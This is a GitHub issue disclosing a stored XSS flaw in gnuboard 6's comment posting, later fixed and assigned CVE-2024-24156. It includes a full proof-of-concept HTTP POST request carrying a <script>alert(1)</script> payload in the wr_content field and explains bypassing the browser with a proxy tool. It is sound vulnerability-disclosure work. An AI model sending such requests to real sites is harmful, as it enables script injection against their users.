Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Stored XSS vulnerability due to HTML Escape unprocessed when writing comments #316

Closed
mirusu400 opened this issue Jan 18, 2024 · 1 comment
Closed

Stored XSS vulnerability due to HTML Escape unprocessed when writing comments #316

mirusu400 opened this issue Jan 18, 2024 · 1 comment
Assignees
@KimTom89

Comments

@mirusu400
Copy link
Contributor

mirusu400 commented Jan 18, 2024
edited

Hello.

Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.

[Name of affected Product]

gnuboard 6

[Affected version]

58c737a

[Vulnerability Type]

  • Stored XSS

[Root Cause]

  • While writing reply on a post, wr_content parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.

[Attack Vectors]

_2024_01_17_19_33_11_286.mp4

As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly to the requests library to create comments, the HTML tags are reflected as they are.

This enables Stored XSS attacks by injecting the tag <script>.

The bottom is a PoC Web request.

POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
mirusu400 added a commit to mirusu400/g6 that referenced this issue Jan 21, 2024
@mirusu400
fix: 댓글 작성 시 HTMl Escaping 처리 (gnuboard#316)
71c1355
@mirusu400 mirusu400 mentioned this issue Jan 21, 2024
Merged
10 tasks
KimTom89 added a commit that referenced this issue Jan 23, 2024
@KimTom89
Merge pull request #347 from mirusu400/master
530be72 
fix: 댓글 작성 시 HTML Escaping 처리 (#316)
@KimTom89 KimTom89 self-assigned this Jan 23, 2024
@KimTom89 KimTom89 mentioned this issue Jan 23, 2024
Merged
10 tasks
@mirusu400 mirusu400 changed the title 댓글 작성 시 HTML Escape 미처리로 인한 Stored XSS 취약점 Stored XSS vulnerability due to HTML Escape unprocessed when writing comments Feb 21, 2024
@mirusu400
Copy link
Contributor Author

This vulnerability has been assigned CVE-2024-24156

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@KimTom89 KimTom89

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@mirusu400 @KimTom89